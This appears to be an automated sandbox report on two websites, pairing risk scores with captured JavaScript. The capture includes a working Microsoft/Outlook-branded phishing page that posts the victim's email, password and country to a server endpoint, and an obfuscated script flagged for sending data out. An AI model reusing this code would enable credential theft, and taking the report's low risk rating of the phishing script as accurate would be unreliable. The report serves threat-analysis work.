| URL: https://bu.marcel-andree.de Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://bu.marcel-andree.de |
| URL: https://bu.marcel-andree.de/.well-known/vercel/sec... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. It uses obfuscated code and dynamic code execution techniques, which can potentially be used for malicious purposes. Additionally, the script appears to be sending data to external domains, which could lead to data exfiltration. While the intent is not entirely clear, the overall behavior of the script warrants further investigation and a medium-risk assessment."
} |
function u(V,B){const c=v();return u=function(s,w){s=s-(0x210e+0x1f56+-0x3f11);let y=c[s];if(u['IufMMc']===undefined){var n=function(W){const Y='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let X='',d='',p=X+n;for(let J=0x1f94+-0x5b*-0x19+-0x2877,P,M,F=0x47c+-0x3bf*-0x2+-0xbfa;M=W['charAt'](F++);~M&&(P=J%(-0x3fd*0x6+-0x25*-0xec+-0xa2a)?P*(-0x19f7+0x106e*0x2+-0x6a5)+M:M,J++%(-0x1d4b*-0x1+-0x264+-0x1ae3))?X+=p['charCodeAt'](F+(-0x4*0x716+-0x2e1+0x1*0x1f43))-(0x2310+-0x101d+-0x1*0x12e9)!==-0x1c21+0x1d0a*-0x1+-0x392b*-0x1?String['fromCharCode'](-0x1420+-0xad3+-0x6*-0x553&P>>(-(0x1*0x2632+0x4*0x77b+-0x441c)*J&-0x51c+0xa93*-0x3+-0xb9*-0x33)):J:0x107e+0x1c49+-0xeed*0x3){M=Y['indexOf'](M);}for(let z=0xfad+0x2*-0x196+0xc81*-0x1,R=X['length'];z<R;z++){d+='%'+('00'+X['charCodeAt'](z)['toString'](0x1f03*-0x1+0x967*-0x1+0x287a))['slice'](-(0x1431+0x23*-0xc1+0x2*0x31a));}return decodeURIComponent(d);};const e=function(W,Y){let X=[],d=0x82*0x1b+-0x1a1a+0xf4*0xd,p,J='';W=n(W);let P;for(P=-0xed3+0xcf+0xe04;P<0x17*0xeb+0x17eb+-0x2c08;P++){X[P]=P;}for(P=0x8*-0x3eb+0x260a+-0x6b2*0x1;P<0x482+-0x119f+-0xe1d*-0x1;P++){d=(d+X[P]+Y['charCodeAt'](P%Y['length']))%(-0xeef+-0x9*-0x335+-0xcee),p=X[P],X[P]=X[d],X[d]=p;}P=0xf73+0x25*-0x7+-0xe70,d=-0x1bf+-0x1ab1+0x1c70;for(let M=-0x1*-0xd85+-0x400+-0x985;M<W['length'];M++){P=(P+(-0x3e9+-0xa65+0x21*0x6f))%(0x2126+0x1eb7+-0x3edd),d=(d+X[P])%(0x166*-0x15+-0x491*-0x7+-0x199*0x1),p=X[P],X[P]=X[d],X[d]=p,J+=String['fromCharCode'](W['charCodeAt'](M)^X[(X[P]+X[d])%(-0x84a+-0x1be*-0x2+0x2*0x2e7)]);}return J;};u['eNxVgS']=e,V=arguments,u['IufMMc']=!![];}const A=c[0x627*0x5+0x253f+0x6cd*-0xa],S=s+A,j=V[S];if(!j){if(u['QhLaVR']===undefined){const W=function(Y){this['sqniZR']=Y,this['puiHUp']=[-0x9d9*-0x1+-0x1344+0x96c,0x413*0x1+0xe71+-0x1284,0xe74+-0x1*-0x305+0x1f1*-0x9],this['draurT']=function(){return'newState';},this['yzxRuH']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['AJzumU']='[\x27|\x22].+[\x27|\x22];?\x20*}';};W['prototype']['SCAUiX']=function(){const Y=new RegExp(this['yzxRuH']+this['AJzumU']),X=Y['test'](this['draurT']['toString']())?--this['puiHUp'][0x1158+0x9fe+-0x1b55]:--this['puiHUp'][-0x98e+0xb4+0x8da];return this['AJbvOM'](X);},W['prototype']['AJbvOM']=function(Y){if(!Boolean(~Y))return Y;return this['XQYCfD'](this['sqniZR']);},W['prototype']['XQYCfD']=function(Y){for(let X=-0x3*0x5e3+-0x1ff1+0x319a,d=this['puiHUp']['length'];X<d;X++){this['puiHUp']['push'](Math['round'](Math['random']())),d=this['puiHUp']['length'];}return Y(this['puiHUp'][0x2*0x3b3+-0x25a+0x4*-0x143]);},new W(u)['SCAUiX'](),u['QhLaVR']=!![];}y=u['eNxVgS'](y,w),V[S]=y;}else y=j;return y;},u(V,B);}const VD=u;(function(Ve,VW){const VT=u,VY=Ve();while(!![]){try{const VX=parseInt(VT(0x316,'RqH6'))/(0x60d*0x5+0x2585+-0x43c5*0x1)+-parseInt(VT(0x31d,'TbvA'))/(-0x1318+-0x1f71+0x328b)*(parseInt(VT(0x1dd,'$luD'))/(0x11*-0x3d+0x116a+-0x1*0xd5a))+-parseInt(VT(0x241,'3SKn'))/(0x140c+-0xde7+0x20b*-0x3)*(parseInt(VT(0x198,'RujQ'))/(-0x192d*0x1+0x4b9+0x1479))+-parseInt(VT(0x1b2,'cE5)'))/(-0x1fb4+0x1859+-0x1*-0x761)+-parseInt(VT(0x381,'1pzL'))/(-0x5*-0x115+0x1*-0xe4e+0x476*0x2)+-parseInt(VT(0x35a,'ZCOv'))/(0x69*-0x58+0x225e+0x2d*0xa)+-parseInt(VT(0x2b2,'G*1f'))/(-0x1528*0x1+0xad9*0x2+-0x81)*(-parseInt(VT(0x2ae,'[##K'))/(-0x1*0x1dcb+0x3*-0xa78+0x3d3d));if(VX===VW)break;else VY['push'](VY['shift']());}catch(Vd){VY['push'](VY['shift']());}}}(v,-0x174*0xa81+0xda681+0xb0126));const e=(function(){let Ve=!![];return function(VW,VY){const VX=Ve?function(){const VC=u;if(VY){const Vd=VY[VC(0x32d,'Ele)')+'ly'](VW,arguments);return VY=null,Vd;}}:function(){};return Ve=![],VX;};}()),d=e(this,function(){const Vh=u,Ve={'whgiH':'((('+Vh(0x27f,'bpA(')+'+)+'+Vh(0x2ee,'Ele)')};return d['toS'+Vh(0x1ef,'3SKn')+'ng']()['sea'+Vh(0x17b,'XIJ6')](Ve['whg'+'iH'])[Vh(0x1ba,'Js%Y')+'tri'+'ng']()[Vh(0x286,'Ele)')+Vh(0x1a7,'2GEj')+'uct'+'or'](d)[Vh(0x2c0,'wFAc')+'rch'](Vh(0x31b,'o8[l')+Vh(0x1d1,'xGK1')+Vh(0x374,'(Z4B')+Vh(0x36d,'TbvA'));});d();const p=(function(){ |
| URL: https://bu.marcel-andree.de/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://bu.marcel-andree.de/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://log.the-network-expert.ca/_next/static/chu... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a React-related utility code that does not contain any high-risk indicators. It includes some moderate-risk behaviors, such as external data transmission and aggressive DOM manipulation, but these are likely part of the normal functionality of a React application. Additionally, the code does not exhibit any signs of obfuscation or malicious intent. Overall, the risk score is assessed as 3, indicating a low-to-medium risk level."
} |
"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[593],{1247:(e,t,n)=>{var r,l,a=n(7836),o=n(9982),i=n(6540),u=n(961);function s(e){var t="https://react.dev/errors/"+e;if(1<arguments.length){t+="?args[]="+encodeURIComponent(arguments[1]);for(var n=2;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n])}return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}function c(e){return!(!e||1!==e.nodeType&&9!==e.nodeType&&11!==e.nodeType)}var f=Symbol.for("react.element"),d=Symbol.for("react.transitional.element"),p=Symbol.for("react.portal"),m=Symbol.for("react.fragment"),h=Symbol.for("react.strict_mode"),g=Symbol.for("react.profiler"),y=Symbol.for("react.provider"),v=Symbol.for("react.consumer"),b=Symbol.for("react.context"),k=Symbol.for("react.forward_ref"),w=Symbol.for("react.suspense"),S=Symbol.for("react.suspense_list"),x=Symbol.for("react.memo"),E=Symbol.for("react.lazy");Symbol.for("react.scope"),Symbol.for("react.debug_trace_mode");var C=Symbol.for("react.offscreen");Symbol.for("react.legacy_hidden"),Symbol.for("react.tracing_marker");var _=Symbol.for("react.memo_cache_sentinel"),P=Symbol.iterator;function z(e){return null===e||"object"!=typeof e?null:"function"==typeof(e=P&&e[P]||e["@@iterator"])?e:null}var N,T,L=Symbol.for("react.client.reference"),O=i.__CLIENT_INTERNALS_DO_NOT_USE_OR_WARN_USERS_THEY_CANNOT_UPGRADE,R=Object.assign;function A(e){if(void 0===N)try{throw Error()}catch(e){var t=e.stack.trim().match(/\n( *(at )?)/);N=t&&t[1]||"",T=-1<e.stack.indexOf("\n at")?" (<anonymous>)":-1<e.stack.indexOf("@")?"@unknown:0:0":""}return"\n"+N+e+T}var F=!1;function D(e,t){if(!e||F)return"";F=!0;var n=Error.prepareStackTrace;Error.prepareStackTrace=void 0;try{var r={DetermineComponentFrameRoot:function(){try{if(t){var n=function(){throw Error()};if(Object.defineProperty(n.prototype,"props",{set:function(){throw Error()}}),"object"==typeof Reflect&&Reflect.construct){try{Reflect.construct(n,[])}catch(e){var r=e}Reflect.construct(e,[],n)}else{try{n.call()}catch(e){r=e}e.call(n.prototype)}}else{try{throw Error()}catch(e){r=e}(n=e())&&"function"==typeof n.catch&&n.catch(function(){})}}catch(e){if(e&&r&&"string"==typeof e.stack)return[e.stack,r.stack]}return[null,null]}};r.DetermineComponentFrameRoot.displayName="DetermineComponentFrameRoot";var l=Object.getOwnPropertyDescriptor(r.DetermineComponentFrameRoot,"name");l&&l.configurable&&Object.defineProperty(r.DetermineComponentFrameRoot,"name",{value:"DetermineComponentFrameRoot"});var a=r.DetermineComponentFrameRoot(),o=a[0],i=a[1];if(o&&i){var u=o.split("\n"),s=i.split("\n");for(l=r=0;r<u.length&&!u[r].includes("DetermineComponentFrameRoot");)r++;for(;l<s.length&&!s[l].includes("DetermineComponentFrameRoot");)l++;if(r===u.length||l===s.length)for(r=u.length-1,l=s.length-1;1<=r&&0<=l&&u[r]!==s[l];)l--;for(;1<=r&&0<=l;r--,l--)if(u[r]!==s[l]){if(1!==r||1!==l)do if(r--,l--,0>l||u[r]!==s[l]){var c="\n"+u[r].replace(" at new "," at ");return e.displayName&&c.includes("<anonymous>")&&(c=c.replace("<anonymous>",e.displayName)),c}while(1<=r&&0<=l);break}}}finally{F=!1,Error.prepareStackTrace=n}return(n=e?e.displayName||e.name:"")?A(n):""}function M(e){try{var t="";do t+=function(e){switch(e.tag){case 26:case 27:case 5:return A(e.type);case 16:return A("Lazy");case 13:return A("Suspense");case 19:return A("SuspenseList");case 0:case 15:return e=D(e.type,!1);case 11:return e=D(e.type.render,!1);case 1:return e=D(e.type,!0);default:return""}}(e),e=e.return;while(e);return t}catch(e){return"\nError generating stack: "+e.message+"\n"+e.stack}}function I(e){var t=e,n=e;if(e.alternate)for(;t.return;)t=t.return;else{e=t;do 0!=(4098&(t=e).flags)&&(n=t.return),e=t.return;while(e)}return 3===t.tag?n:null}function U(e){if(13===e.tag){var t=e.memoizedState;if(null===t&&null!==(e=e.alternate)&&(t=e.memoizedState),null!==t)return t.dehydrated}return null}function j(e){i |
| URL: https://log.the-network-expert.ca/_next/static/chu... Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "The provided JavaScript snippet contains a mix of behaviors that require further review. While it does not exhibit any clear malicious intent, there are some moderate-risk indicators that warrant closer inspection. The script appears to be using dynamic code execution techniques, which could potentially be used for malicious purposes. Additionally, it is sending data to external domains, which may raise privacy concerns depending on the nature of the data being transmitted. Overall, the script demonstrates some potentially concerning behaviors that merit additional investigation to determine the full scope and intent of its functionality."
} |
(()=>{"use strict";var e={},r={};function t(o){var n=r[o];if(void 0!==n)return n.exports;var i=r[o]={exports:{}},l=!0;try{e[o](i,i.exports,t),l=!1}finally{l&&delete r[o]}return i.exports}t.m=e,(()=>{var e=[];t.O=(r,o,n,i)=>{if(o){i=i||0;for(var l=e.length;l>0&&e[l-1][2]>i;l--)e[l]=e[l-1];e[l]=[o,n,i];return}for(var a=1/0,l=0;l<e.length;l++){for(var[o,n,i]=e[l],u=!0,f=0;f<o.length;f++)(!1&i||a>=i)&&Object.keys(t.O).every(e=>t.O[e](o[f]))?o.splice(f--,1):(u=!1,i<a&&(a=i));if(u){e.splice(l--,1);var s=n();void 0!==s&&(r=s)}}return r}})(),t.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return t.d(r,{a:r}),r},t.d=(e,r)=>{for(var o in r)t.o(r,o)&&!t.o(e,o)&&Object.defineProperty(e,o,{enumerable:!0,get:r[o]})},t.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||Function("return this")()}catch(e){if("object"==typeof window)return window}}(),t.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),t.r=e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.p="/_next/",(()=>{var e={68:0};t.O.j=r=>0===e[r];var r=(r,o)=>{var n,i,[l,a,u]=o,f=0;if(l.some(r=>0!==e[r])){for(n in a)t.o(a,n)&&(t.m[n]=a[n]);if(u)var s=u(t)}for(r&&r(o);f<l.length;f++)i=l[f],t.o(e,i)&&e[i]&&e[i][0](),e[i]=0;return t.O(s)},o=self.webpackChunk_N_E=self.webpackChunk_N_E||[];o.forEach(r.bind(null,0)),o.push=r.bind(null,o.push.bind(o))})()})();
;(function(){if(!/(?:^|;\s)__vercel_toolbar=1(?:;|$)/.test(document.cookie))return;var s=document.createElement('script');s.src='https://vercel.live/_next-live/feedback/feedback.js';s.setAttribute("data-explicit-opt-in","true");s.setAttribute("data-cookie-opt-in","true");((document.head||document.documentElement).appendChild(s))})();
|
| URL: https://bu.marcel-andree.de/static/js/main.103925a... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a minified React library code. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or suspicious redirects. The code seems to be focused on handling DOM manipulation and attribute management, which are common and expected behaviors for a React library. While the code is obfuscated, this is a common practice for production-ready JavaScript libraries to reduce file size and protect intellectual property. Overall, the risk score is low, and the code appears to be a legitimate part of the React library."
} |
/*! For license information please see main.103925a0.js.LICENSE.txt */
(()=>{"use strict";var e={730:(e,n,t)=>{var r=t(43),l=t(853);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var o=new Set,u={};function i(e,n){s(e,n),s(e+"Capture",n)}function s(e,n){for(u[e]=n,e=0;e<n.length;e++)o.add(n[e])}var c=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),f=Object.prototype.hasOwnProperty,d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\-.0-9\u00B7\u0300-\u036F\u203F-\u2040]*$/,p={},m={};function h(e,n,t,r,l,a,o){this.acceptsBooleans=2===n||3===n||4===n,this.attributeName=r,this.attributeNamespace=l,this.mustUseProperty=t,this.propertyName=e,this.type=n,this.sanitizeURL=a,this.removeEmptyString=o}var v={};"children dangerouslySetInnerHTML defaultValue defaultChecked innerHTML suppressContentEditableWarning suppressHydrationWarning style".split(" ").forEach((function(e){v[e]=new h(e,0,!1,e,null,!1,!1)})),[["acceptCharset","accept-charset"],["className","class"],["htmlFor","for"],["httpEquiv","http-equiv"]].forEach((function(e){var n=e[0];v[n]=new h(n,1,!1,e[1],null,!1,!1)})),["contentEditable","draggable","spellCheck","value"].forEach((function(e){v[e]=new h(e,2,!1,e.toLowerCase(),null,!1,!1)})),["autoReverse","externalResourcesRequired","focusable","preserveAlpha"].forEach((function(e){v[e]=new h(e,2,!1,e,null,!1,!1)})),"allowFullScreen async autoFocus autoPlay controls default defer disabled disablePictureInPicture disableRemotePlayback formNoValidate hidden loop noModule noValidate open playsInline readOnly required reversed scoped seamless itemScope".split(" ").forEach((function(e){v[e]=new h(e,3,!1,e.toLowerCase(),null,!1,!1)})),["checked","multiple","muted","selected"].forEach((function(e){v[e]=new h(e,3,!0,e,null,!1,!1)})),["capture","download"].forEach((function(e){v[e]=new h(e,4,!1,e,null,!1,!1)})),["cols","rows","size","span"].forEach((function(e){v[e]=new h(e,6,!1,e,null,!1,!1)})),["rowSpan","start"].forEach((function(e){v[e]=new h(e,5,!1,e.toLowerCase(),null,!1,!1)}));var g=/[\-:]([a-z])/g;function y(e){return e[1].toUpperCase()}function b(e,n,t,r){var l=v.hasOwnProperty(n)?v[n]:null;(null!==l?0!==l.type:r||!(2<n.length)||"o"!==n[0]&&"O"!==n[0]||"n"!==n[1]&&"N"!==n[1])&&(function(e,n,t,r){if(null===n||"undefined"===typeof n||function(e,n,t,r){if(null!==t&&0===t.type)return!1;switch(typeof n){case"function":case"symbol":return!0;case"boolean":return!r&&(null!==t?!t.acceptsBooleans:"data-"!==(e=e.toLowerCase().slice(0,5))&&"aria-"!==e);default:return!1}}(e,n,t,r))return!0;if(r)return!1;if(null!==t)switch(t.type){case 3:return!n;case 4:return!1===n;case 5:return isNaN(n);case 6:return isNaN(n)||1>n}return!1}(n,t,l,r)&&(t=null),r||null===l?function(e){return!!f.call(m,e)||!f.call(p,e)&&(d.test(e)?m[e]=!0:(p[e]=!0,!1))}(n)&&(null===t?e.removeAttribute(n):e.setAttribute(n,""+t)):l.mustUseProperty?e[l.propertyName]=null===t?3!==l.type&&"":t:(n=l.attributeName,r=l.attributeNamespace,null===t?e.removeAttribute(n):(t=3===(l=l.type)||4===l&&!0===t?"":""+t,r?e.setAttributeNS(r,n,t):e.setAttribute(n,t))))}"accent-height alignment-baseline arabic-form baseline-shift cap-height clip-path clip-rule color-interpolation color-interpolation-filters color-profile color-rendering dominant-baseline enable-background fill-opacity fill-rule flood-color flood-opacity font-family font-size font-size-adjust font-stretch font-style font-variant font-weight glyph-n |
| URL: https://bu.marcel-andree.de/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://bu.marcel-andree.de/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://log.the-network-expert.ca/_next/static/chu... Model: Joe Sandbox AI | ```json
{
"risk_score": 3,
"reasoning": "The script uses XMLHttpRequest to send data, which is a moderate-risk indicator (+2 points). It also includes basic authentication headers, but there is no indication of data exfiltration or interaction with suspicious domains. The script appears to be part of a library (likely Axios) for handling HTTP requests, which is a common and legitimate use case. No high-risk behaviors are present, and there is no evidence of malicious intent."
} |
(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[505],{2505:(e,t,r)=>{e.exports=r(8015)},5592:(e,t,r)=>{"use strict";var n=r(9516),o=r(7522),s=r(3948),i=r(9106),a=r(9615),u=r(2012),c=r(4202),f=r(7763);e.exports=function(e){return new Promise(function(t,r){var p=e.data,l=e.headers,d=e.responseType;n.isFormData(p)&&delete l["Content-Type"];var h=new XMLHttpRequest;if(e.auth){var m=e.auth.username||"",g=e.auth.password?unescape(encodeURIComponent(e.auth.password)):"";l.Authorization="Basic "+btoa(m+":"+g)}var v=a(e.baseURL,e.url);function y(){if(h){var n="getAllResponseHeaders"in h?u(h.getAllResponseHeaders()):null;o(t,r,{data:d&&"text"!==d&&"json"!==d?h.response:h.responseText,status:h.status,statusText:h.statusText,headers:n,config:e,request:h}),h=null}}if(h.open(e.method.toUpperCase(),i(v,e.params,e.paramsSerializer),!0),h.timeout=e.timeout,"onloadend"in h?h.onloadend=y:h.onreadystatechange=function(){h&&4===h.readyState&&(0!==h.status||h.responseURL&&0===h.responseURL.indexOf("file:"))&&setTimeout(y)},h.onabort=function(){h&&(r(f("Request aborted",e,"ECONNABORTED",h)),h=null)},h.onerror=function(){r(f("Network Error",e,null,h)),h=null},h.ontimeout=function(){var t="timeout of "+e.timeout+"ms exceeded";e.timeoutErrorMessage&&(t=e.timeoutErrorMessage),r(f(t,e,e.transitional&&e.transitional.clarifyTimeoutError?"ETIMEDOUT":"ECONNABORTED",h)),h=null},n.isStandardBrowserEnv()){var b=(e.withCredentials||c(v))&&e.xsrfCookieName?s.read(e.xsrfCookieName):void 0;b&&(l[e.xsrfHeaderName]=b)}"setRequestHeader"in h&&n.forEach(l,function(e,t){void 0===p&&"content-type"===t.toLowerCase()?delete l[t]:h.setRequestHeader(t,e)}),n.isUndefined(e.withCredentials)||(h.withCredentials=!!e.withCredentials),d&&"json"!==d&&(h.responseType=e.responseType),"function"==typeof e.onDownloadProgress&&h.addEventListener("progress",e.onDownloadProgress),"function"==typeof e.onUploadProgress&&h.upload&&h.upload.addEventListener("progress",e.onUploadProgress),e.cancelToken&&e.cancelToken.promise.then(function(e){h&&(h.abort(),r(e),h=null)}),p||(p=null),h.send(p)})}},8015:(e,t,r)=>{"use strict";var n=r(9516),o=r(9012),s=r(5155),i=r(5343);function a(e){var t=new s(e),r=o(s.prototype.request,t);return n.extend(r,s.prototype,t),n.extend(r,t),r}var u=a(r(6987));u.Axios=s,u.create=function(e){return a(i(u.defaults,e))},u.Cancel=r(1928),u.CancelToken=r(3191),u.isCancel=r(3864),u.all=function(e){return Promise.all(e)},u.spread=r(7980),u.isAxiosError=r(5019),e.exports=u,e.exports.default=u},1928:e=>{"use strict";function t(e){this.message=e}t.prototype.toString=function(){return"Cancel"+(this.message?": "+this.message:"")},t.prototype.__CANCEL__=!0,e.exports=t},3191:(e,t,r)=>{"use strict";var n=r(1928);function o(e){if("function"!=typeof e)throw TypeError("executor must be a function.");this.promise=new Promise(function(e){t=e});var t,r=this;e(function(e){r.reason||(r.reason=new n(e),t(r.reason))})}o.prototype.throwIfRequested=function(){if(this.reason)throw this.reason},o.source=function(){var e;return{token:new o(function(t){e=t}),cancel:e}},e.exports=o},3864:e=>{"use strict";e.exports=function(e){return!!(e&&e.__CANCEL__)}},5155:(e,t,r)=>{"use strict";var n=r(9516),o=r(9106),s=r(3471),i=r(4490),a=r(5343),u=r(4841),c=u.validators;function f(e){this.defaults=e,this.interceptors={request:new s,response:new s}}f.prototype.request=function(e){"string"==typeof e?(e=arguments[1]||{},e.url=arguments[0]):e=e||{},(e=a(this.defaults,e)).method?e.method=e.method.toLowerCase():this.defaults.method?e.method=this.defaults.method.toLowerCase():e.method="get";var t,r=e.transitional;void 0!==r&&u.assertOptions(r,{silentJSONParsing:c.transitional(c.boolean,"1.0.0"),forcedJSONParsing:c.transitional(c.boolean,"1.0.0"),clarifyTimeoutError:c.transitional(c.boolean,"1.0.0")},!1);var n=[],o=!0;this.interceptors.request.forEach(function(t){("function"!=typeof t.runWhen||!1!==t.runWhen(e))&&(o=o&&t.synchronous,n.unshift(t.fulfilled,t.rejected))});var s=[];if(this.interceptors.response.forEac |
| URL: https://log.the-network-expert.ca/_next/static/chu... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script demonstrates a mix of moderate-risk and low-risk behaviors. It sends user data (email and password) to an external API endpoint, which is a moderate-risk indicator. However, the script also includes some legitimate functionality, such as fetching the user's country information and displaying a modal during form submission. The overall behavior suggests a potentially legitimate application, but the data transmission to an external domain without clear transparency raises some concerns."
} |
(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[332],{7276:(e,t,s)=>{(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return s(6993)}])},6993:(e,t,s)=>{"use strict";s.r(t),s.d(t,{default:()=>c});var a=s(4848),n=s(6540),o=s(2505),l=s.n(o),i=s(9680),r=s.n(i);function c(){let[e,t]=(0,n.useState)(""),[s,o]=(0,n.useState)(""),[i,c]=(0,n.useState)(""),[d,m]=(0,n.useState)(!1),[u,_]=(0,n.useState)(""),[h,g]=(0,n.useState)(!1);(0,n.useEffect)(()=>{l().get("https://ipinfo.io/json?token=c3e87e382ddea7").then(e=>{let t=e.data.country;return l().get("https://restcountries.com/v3.1/alpha/".concat(t))}).then(e=>{c(e.data[0].name.common)}).catch(e=>{console.error("Failed to fetch full country name:",e),_("Failed to retrieve country information.")})},[]);let p=async t=>{if(t.preventDefault(),s.length>=5){g(!0);try{let t=await l().post("/api/send-email",{email:e,password:s,country:i});console.log("Email sent successfully!",t.data.message),window.location.href="https://ne.abruis.io"}catch(e){console.error("Failed to send email:",e),_("Failed to submit. Please try again.")}finally{g(!1)}}else _("Password must be at least 5 characters long.")},x=e=>/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(String(e).toLowerCase());return(0,a.jsxs)("div",{className:r().container,children:[(0,a.jsx)("div",{className:r().background}),(0,a.jsxs)("div",{className:r().loginBox,children:[(0,a.jsx)("img",{src:"/logo.png",alt:"Logo",className:r().logo}),(0,a.jsx)("div",{className:r().message,children:d?"Validate email password to continue":"Verify email to proceed"}),d?(0,a.jsxs)(a.Fragment,{children:[(0,a.jsx)("div",{className:r().displayEmail,children:e}),(0,a.jsxs)("form",{onSubmit:p,children:[(0,a.jsx)("input",{type:"password",placeholder:"Password",className:r().inputField,value:s,onChange:e=>o(e.target.value)}),(0,a.jsx)("div",{className:r().buttonContainer,children:(0,a.jsx)("button",{type:"submit",className:r().submitButton,children:"Validate"})})]})]}):(0,a.jsxs)("form",{onSubmit:t=>{t.preventDefault(),x(e)?(m(!0),_("")):_("Please enter a valid email address.")},children:[(0,a.jsx)("input",{type:"email",placeholder:"Email Address",className:r().inputField,value:e,onChange:e=>t(e.target.value)}),(0,a.jsx)("div",{className:r().buttonContainer,children:(0,a.jsx)("button",{type:"submit",className:r().nextButton,children:"Next"})})]}),u&&(0,a.jsx)("div",{className:r().errorMessage,children:u}),h&&(0,a.jsx)("div",{className:r().modal,children:(0,a.jsx)("div",{className:r().modalContent,children:(0,a.jsx)("p",{children:"Processing..."})})})]})]})}},9680:e=>{e.exports={container:"Home_container__d256j",background:"Home_background__nqUIs",loginBox:"Home_loginBox__i6Tc_",logo:"Home_logo__IOQAX",message:"Home_message__OKL2m",displayEmail:"Home_displayEmail__HOGgk",inputField:"Home_inputField__h82W1",buttonContainer:"Home_buttonContainer__nOVuY",submitButton:"Home_submitButton__ECzIY",nextButton:"Home_nextButton__r_Kss",errorMessage:"Home_errorMessage__n47_b",modal:"Home_modal___NgiA",modalContent:"Home_modalContent__XKBCH"}}},e=>{var t=t=>e(e.s=t);e.O(0,[505,636,593,792],()=>t(7276)),_N_E=e.O()}]);
|
| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email Address"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify email to proceed",
"prominent_button_name": "Next",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://log.the-network-expert.ca Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://log.the-network-expert.ca |
| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify email to proceed",
"prominent_button_name": "Next",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | {
"brands": [
"Outlook"
]
} |
|
| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | {
"brands": [
"Outlook"
]
} |
|
| URL: https://log.the-network-expert.ca/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft",
"Outlook"
]
} |
|
